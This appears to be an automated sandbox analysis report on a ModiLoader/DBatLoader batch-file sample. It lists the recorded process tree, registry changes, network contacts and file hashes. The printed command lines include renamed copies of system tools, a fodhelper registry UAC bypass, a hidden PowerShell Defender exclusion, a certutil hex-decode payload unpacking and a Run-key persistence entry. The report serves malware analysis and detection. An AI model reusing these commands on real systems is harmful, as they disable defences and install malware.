Malware Analysis Report

2025-06-16 05:49

Sample ID 240326-kbr7laec27
Target Order inquiry.tar.gz
SHA256 54bd1088faa941774b69730d313057adc66c12983564b978e3ca753cdf8a6c0b
Tags
modiloader trojan persistence
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

54bd1088faa941774b69730d313057adc66c12983564b978e3ca753cdf8a6c0b

Threat Level: Known bad

The file Order inquiry.tar.gz was found to be: Known bad.

Malicious Activity Summary

modiloader trojan persistence

ModiLoader, DBatLoader

ModiLoader Second Stage

Executes dropped EXE

Loads dropped DLL

Adds Run key to start application

Suspicious use of SetThreadContext

Drops file in Windows directory

Enumerates physical storage devices

Program crash

Suspicious behavior: EnumeratesProcesses

Modifies registry key

Modifies registry class

Suspicious behavior: CmdExeWriteProcessMemorySpam

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Script User-Agent

Suspicious behavior: MapViewOfSection

Kills process with taskkill

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-26 08:25

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-26 08:25

Reported

2024-03-26 08:27

Platform

win7-20231129-en

Max time kernel

51s

Max time network

16s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\Order inquiry.bat"

Signatures

ModiLoader, DBatLoader

trojan modiloader

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Public\Libraries\Lewxa.com

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings\shell C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings\shell\open C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\\Users " C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings\shell\open\command C:\Windows\system32\reg.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Users\Public\Libraries\Lewxa.com N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Public\xkn.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Public\xkn.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2064 wrote to memory of 2912 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2064 wrote to memory of 2912 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2064 wrote to memory of 2912 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2912 wrote to memory of 2916 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\extrac32.exe
PID 2912 wrote to memory of 2916 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\extrac32.exe
PID 2912 wrote to memory of 2916 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\extrac32.exe
PID 2064 wrote to memory of 2976 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2064 wrote to memory of 2976 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2064 wrote to memory of 2976 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2976 wrote to memory of 1704 N/A C:\Users\Public\alpha.exe C:\Windows\system32\extrac32.exe
PID 2976 wrote to memory of 1704 N/A C:\Users\Public\alpha.exe C:\Windows\system32\extrac32.exe
PID 2976 wrote to memory of 1704 N/A C:\Users\Public\alpha.exe C:\Windows\system32\extrac32.exe
PID 2064 wrote to memory of 3008 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2064 wrote to memory of 3008 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2064 wrote to memory of 3008 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 3008 wrote to memory of 2540 N/A C:\Users\Public\alpha.exe C:\Windows\system32\extrac32.exe
PID 3008 wrote to memory of 2540 N/A C:\Users\Public\alpha.exe C:\Windows\system32\extrac32.exe
PID 3008 wrote to memory of 2540 N/A C:\Users\Public\alpha.exe C:\Windows\system32\extrac32.exe
PID 2064 wrote to memory of 2592 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2064 wrote to memory of 2592 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2064 wrote to memory of 2592 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2592 wrote to memory of 2644 N/A C:\Users\Public\alpha.exe C:\Users\Public\xkn.exe
PID 2592 wrote to memory of 2644 N/A C:\Users\Public\alpha.exe C:\Users\Public\xkn.exe
PID 2592 wrote to memory of 2644 N/A C:\Users\Public\alpha.exe C:\Users\Public\xkn.exe
PID 2644 wrote to memory of 2708 N/A C:\Users\Public\xkn.exe C:\Users\Public\alpha.exe
PID 2644 wrote to memory of 2708 N/A C:\Users\Public\xkn.exe C:\Users\Public\alpha.exe
PID 2644 wrote to memory of 2708 N/A C:\Users\Public\xkn.exe C:\Users\Public\alpha.exe
PID 2708 wrote to memory of 2848 N/A C:\Users\Public\alpha.exe C:\Windows\system32\reg.exe
PID 2708 wrote to memory of 2848 N/A C:\Users\Public\alpha.exe C:\Windows\system32\reg.exe
PID 2708 wrote to memory of 2848 N/A C:\Users\Public\alpha.exe C:\Windows\system32\reg.exe
PID 2064 wrote to memory of 2808 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2064 wrote to memory of 2808 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2064 wrote to memory of 2808 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2808 wrote to memory of 2476 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 2808 wrote to memory of 2476 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 2808 wrote to memory of 2476 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 2064 wrote to memory of 2616 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2064 wrote to memory of 2616 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2064 wrote to memory of 2616 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2616 wrote to memory of 2692 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 2616 wrote to memory of 2692 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 2616 wrote to memory of 2692 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 2064 wrote to memory of 2944 N/A C:\Windows\system32\cmd.exe C:\Users\Public\Libraries\Lewxa.com
PID 2064 wrote to memory of 2944 N/A C:\Windows\system32\cmd.exe C:\Users\Public\Libraries\Lewxa.com
PID 2064 wrote to memory of 2944 N/A C:\Windows\system32\cmd.exe C:\Users\Public\Libraries\Lewxa.com
PID 2064 wrote to memory of 2944 N/A C:\Windows\system32\cmd.exe C:\Users\Public\Libraries\Lewxa.com
PID 2064 wrote to memory of 2020 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2064 wrote to memory of 2020 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2064 wrote to memory of 2020 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2064 wrote to memory of 320 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2064 wrote to memory of 320 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2064 wrote to memory of 320 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2064 wrote to memory of 1520 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2064 wrote to memory of 1520 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2064 wrote to memory of 1520 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2064 wrote to memory of 2812 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2064 wrote to memory of 2812 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2064 wrote to memory of 2812 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2064 wrote to memory of 2732 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2064 wrote to memory of 2732 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2064 wrote to memory of 2732 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2732 wrote to memory of 1968 N/A C:\Users\Public\alpha.exe C:\Windows\system32\taskkill.exe
PID 2732 wrote to memory of 1968 N/A C:\Users\Public\alpha.exe C:\Windows\system32\taskkill.exe
PID 2732 wrote to memory of 1968 N/A C:\Users\Public\alpha.exe C:\Windows\system32\taskkill.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\Order inquiry.bat"

C:\Windows\system32\cmd.exe

cmd /c extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe

C:\Windows\system32\extrac32.exe

extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe

C:\Windows\system32\extrac32.exe

extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe

C:\Windows\system32\extrac32.exe

extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "

C:\Users\Public\xkn.exe

C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "

C:\Users\Public\alpha.exe

"C:\Users\Public\alpha.exe" /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "

C:\Windows\system32\reg.exe

reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Order inquiry.bat" "C:\\Users\\Public\\Lewxa.txt" 9

C:\Users\Public\kn.exe

C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Order inquiry.bat" "C:\\Users\\Public\\Lewxa.txt" 9

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12

C:\Users\Public\kn.exe

C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12

C:\Users\Public\Libraries\Lewxa.com

C:\\Users\\Public\\Libraries\\Lewxa.com

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa" / A / F / Q / S

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa.txt" / A / F / Q / S

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM SystemSettings.exe

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM SystemSettingsAdminFlows.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2944 -s 716

Network

Country Destination Domain Proto
US 8.8.8.8:53 onedrive.live.com udp
US 13.107.137.11:443 onedrive.live.com tcp
US 13.107.137.11:443 onedrive.live.com tcp

Files

\Users\Public\alpha.exe

MD5 5746bd7e255dd6a8afa06f7c42c1ba41
SHA1 0f3c4ff28f354aede202d54e9d1c5529a3bf87d8
SHA256 db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
SHA512 3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

C:\Users\Public\alpha.exe

MD5 715f276b8045bc0e5510b4d60cde68b5
SHA1 e4878dcb8da163ab85c17d567deda1f1772cdf97
SHA256 ab27d8cbf064962aa4016bbbcd21b51c1b90b1c4b1f9c2ee1d6a274c9dff1368
SHA512 676f8484008356a071b467ac0a3f6f627244ec2c09506ebcd2433131ac8d5438195810cdca664d7f39d34abf7de18a549909b38db8b40414706976de1e748b2f

\Users\Public\xkn.exe

MD5 852d67a27e454bd389fa7f02a8cbe23f
SHA1 5330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256 a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

memory/2644-21-0x000000001B610000-0x000000001B8F2000-memory.dmp

memory/2644-22-0x0000000001BA0000-0x0000000001BA8000-memory.dmp

memory/2644-23-0x000007FEF5E20000-0x000007FEF67BD000-memory.dmp

memory/2644-24-0x0000000002BE0000-0x0000000002C60000-memory.dmp

memory/2644-30-0x000007FEF5E20000-0x000007FEF67BD000-memory.dmp

memory/2644-31-0x0000000002BE0000-0x0000000002C60000-memory.dmp

memory/2644-32-0x0000000002BE0000-0x0000000002C60000-memory.dmp

memory/2644-33-0x0000000002BE0000-0x0000000002C60000-memory.dmp

memory/2644-34-0x000007FEF5E20000-0x000007FEF67BD000-memory.dmp

\Users\Public\kn.exe

MD5 ec1fd3050dbc40ec7e87ab99c7ca0b03
SHA1 ae7fdfc29f4ef31e38ebf381e61b503038b5cb35
SHA256 1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3
SHA512 4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

C:\Users\Public\Lewxa.txt

MD5 5e3260366c3c643511ba9d5f0bffefd4
SHA1 ef84ae0ed0a835dda0c8ebab1c166e95e8da1403
SHA256 41d8ce140db1ab125f33ac3e8603d01fd85191b37b41314808cb29e069dd4243
SHA512 46e1a3f630e0710bb182a0d9cc1876d7df725c818342def0ed1a657cc6b79b9c996ae483d09357344234d725a10c4af037e67ece32293b63fcb4bf7c932acfc7

C:\Users\Public\Libraries\Lewxa.com

MD5 aa6d1a831ba292e2670da589b8aea980
SHA1 fe61d016a11a1ea9b85bec7139d44b1acbb6bfcd
SHA256 f5cd840346c9d16181109ba81cd4206e46f87682799b54eaa0f3cb4689a7d05d
SHA512 d0eaa2933b75d9114714ecf6c0f04b1bc4396ee570759bc3d7bfca7426f039d0234ffc6791de66332ce5682dfbc5a6daa1fbb252b68e67c65362e42a5a295c08

memory/2944-55-0x0000000003160000-0x0000000004160000-memory.dmp

memory/2944-52-0x0000000000230000-0x0000000000231000-memory.dmp

memory/2944-59-0x0000000003160000-0x0000000004160000-memory.dmp

memory/2944-62-0x0000000000230000-0x0000000000231000-memory.dmp

memory/2944-63-0x0000000000400000-0x0000000000527000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-26 08:25

Reported

2024-03-26 08:28

Platform

win10-20240221-en

Max time kernel

128s

Max time network

135s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Order inquiry.bat"

Signatures

ModiLoader, DBatLoader

trojan modiloader

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows \System32\1177894.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000\Software\Microsoft\Windows\CurrentVersion\Run\Othwubnr = "C:\\Users\\Public\\Othwubnr.url" C:\Users\Public\Libraries\Lewxa.com N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4324 set thread context of 5100 N/A C:\Windows\SysWOW64\SndVol.exe \??\c:\program files (x86)\internet explorer\iexplore.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\rescache\_merged\2717123927\3950266016.pri C:\Windows\system32\fodhelper.exe N/A

Enumerates physical storage devices

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\\Users " C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\ms-settings\shell\open\command C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\ms-settings C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\ms-settings\shell C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\ms-settings\shell\open C:\Windows\system32\reg.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\SndVol.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Public\xkn.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 668 wrote to memory of 3904 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 668 wrote to memory of 3904 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3904 wrote to memory of 4676 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\extrac32.exe
PID 3904 wrote to memory of 4676 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\extrac32.exe
PID 668 wrote to memory of 3132 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 668 wrote to memory of 3132 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 3132 wrote to memory of 2540 N/A C:\Users\Public\alpha.exe C:\Windows\system32\extrac32.exe
PID 3132 wrote to memory of 2540 N/A C:\Users\Public\alpha.exe C:\Windows\system32\extrac32.exe
PID 668 wrote to memory of 3672 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 668 wrote to memory of 3672 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 3672 wrote to memory of 2748 N/A C:\Users\Public\alpha.exe C:\Windows\system32\extrac32.exe
PID 3672 wrote to memory of 2748 N/A C:\Users\Public\alpha.exe C:\Windows\system32\extrac32.exe
PID 668 wrote to memory of 2840 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 668 wrote to memory of 2840 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2840 wrote to memory of 2852 N/A C:\Users\Public\alpha.exe C:\Users\Public\xkn.exe
PID 2840 wrote to memory of 2852 N/A C:\Users\Public\alpha.exe C:\Users\Public\xkn.exe
PID 2852 wrote to memory of 4272 N/A C:\Users\Public\xkn.exe C:\Users\Public\alpha.exe
PID 2852 wrote to memory of 4272 N/A C:\Users\Public\xkn.exe C:\Users\Public\alpha.exe
PID 4272 wrote to memory of 800 N/A C:\Users\Public\alpha.exe C:\Windows\system32\reg.exe
PID 4272 wrote to memory of 800 N/A C:\Users\Public\alpha.exe C:\Windows\system32\reg.exe
PID 2852 wrote to memory of 3324 N/A C:\Users\Public\xkn.exe C:\Windows\system32\fodhelper.exe
PID 2852 wrote to memory of 3324 N/A C:\Users\Public\xkn.exe C:\Windows\system32\fodhelper.exe
PID 668 wrote to memory of 4672 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 668 wrote to memory of 4672 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 4672 wrote to memory of 1620 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 4672 wrote to memory of 1620 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 668 wrote to memory of 3664 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 668 wrote to memory of 3664 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 3664 wrote to memory of 4532 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 3664 wrote to memory of 4532 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 668 wrote to memory of 2480 N/A C:\Windows\system32\cmd.exe C:\Users\Public\Libraries\Lewxa.com
PID 668 wrote to memory of 2480 N/A C:\Windows\system32\cmd.exe C:\Users\Public\Libraries\Lewxa.com
PID 668 wrote to memory of 2480 N/A C:\Windows\system32\cmd.exe C:\Users\Public\Libraries\Lewxa.com
PID 668 wrote to memory of 1208 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 668 wrote to memory of 1208 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 668 wrote to memory of 2436 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 668 wrote to memory of 2436 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 668 wrote to memory of 2372 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 668 wrote to memory of 2372 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 668 wrote to memory of 4484 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 668 wrote to memory of 4484 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 668 wrote to memory of 1696 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 668 wrote to memory of 1696 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 1696 wrote to memory of 2500 N/A C:\Users\Public\alpha.exe C:\Windows\system32\taskkill.exe
PID 1696 wrote to memory of 2500 N/A C:\Users\Public\alpha.exe C:\Windows\system32\taskkill.exe
PID 668 wrote to memory of 4924 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 668 wrote to memory of 4924 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 4924 wrote to memory of 3160 N/A C:\Users\Public\alpha.exe C:\Windows\system32\taskkill.exe
PID 4924 wrote to memory of 3160 N/A C:\Users\Public\alpha.exe C:\Windows\system32\taskkill.exe
PID 2480 wrote to memory of 1448 N/A C:\Users\Public\Libraries\Lewxa.com C:\Windows\SysWOW64\cmd.exe
PID 2480 wrote to memory of 1448 N/A C:\Users\Public\Libraries\Lewxa.com C:\Windows\SysWOW64\cmd.exe
PID 2480 wrote to memory of 1448 N/A C:\Users\Public\Libraries\Lewxa.com C:\Windows\SysWOW64\cmd.exe
PID 2480 wrote to memory of 224 N/A C:\Users\Public\Libraries\Lewxa.com C:\Windows\SysWOW64\cmd.exe
PID 2480 wrote to memory of 224 N/A C:\Users\Public\Libraries\Lewxa.com C:\Windows\SysWOW64\cmd.exe
PID 2480 wrote to memory of 224 N/A C:\Users\Public\Libraries\Lewxa.com C:\Windows\SysWOW64\cmd.exe
PID 2480 wrote to memory of 2116 N/A C:\Users\Public\Libraries\Lewxa.com C:\Windows\SysWOW64\cmd.exe
PID 2480 wrote to memory of 2116 N/A C:\Users\Public\Libraries\Lewxa.com C:\Windows\SysWOW64\cmd.exe
PID 2480 wrote to memory of 2116 N/A C:\Users\Public\Libraries\Lewxa.com C:\Windows\SysWOW64\cmd.exe
PID 2116 wrote to memory of 2072 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows \System32\1177894.exe
PID 2116 wrote to memory of 2072 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows \System32\1177894.exe
PID 2072 wrote to memory of 4084 N/A C:\Windows \System32\1177894.exe C:\Windows\system32\cmd.exe
